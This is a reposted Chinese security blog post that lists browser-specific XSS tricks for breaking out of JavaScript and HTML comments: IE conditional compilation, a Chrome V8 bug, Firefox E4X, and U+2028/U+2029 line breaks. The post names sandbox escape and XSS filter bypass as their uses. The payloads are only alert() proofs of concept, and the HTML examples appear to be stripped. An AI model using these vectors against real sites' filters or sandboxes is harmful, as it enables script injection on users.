Breaking javascript/html comments

  • A+
所属分类:lcx

转自:http://0xsec.org/?p=540

1.Javascript

IE:

/*@cc_on!alert(1)//*/

利用IE的条件编译机制突破, about @cc_on statment.

Chrome:

/*猪/alert(3)//*/

正如你所看到的,这是个由v8引擎解析注释时候做了个优化导致的BUG,15版中已经修复

Firefox:

>//,alert(1)

E4X特性...

*:

/ //alert(1)

解析顺序问题./regex//alert(1),正则语法优先解析

//[u+2028]alert(1)

//[u+2029]alert(1)

这个是.mario补充的,U+2028 and U+2029 will create a linebreak and help you jump out of JS line-comments

2.HTML

元素内不可嵌套元素.

这是个ie解析条件注释的bug,在ie10中条件注释已被遗弃.

Chrome,Firefox支持.


IE,Opera支持.

What's the use?
Javascript的向量一般用于打破沙箱,如Facebook对第三方应用采用的沙箱,HTML的向量用于Bypass各种xss filter.
文章来源于lcx.cc:Breaking javascript/html comments

相关推荐: 新网DNS疑遭攻击 两台服务器无法响应

  DoNews 6月10日消息(记者 王星予)6月10日下午,不断有站长反映,自己在新网DNS服务下的域名无法访问,通过ping域名发现无法请求主机。目前尚不清楚导致故障的原因,有站长怀疑新网DNS或遭到攻击。   截至目前,虽然部分网站已经恢复访问,但还有…

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: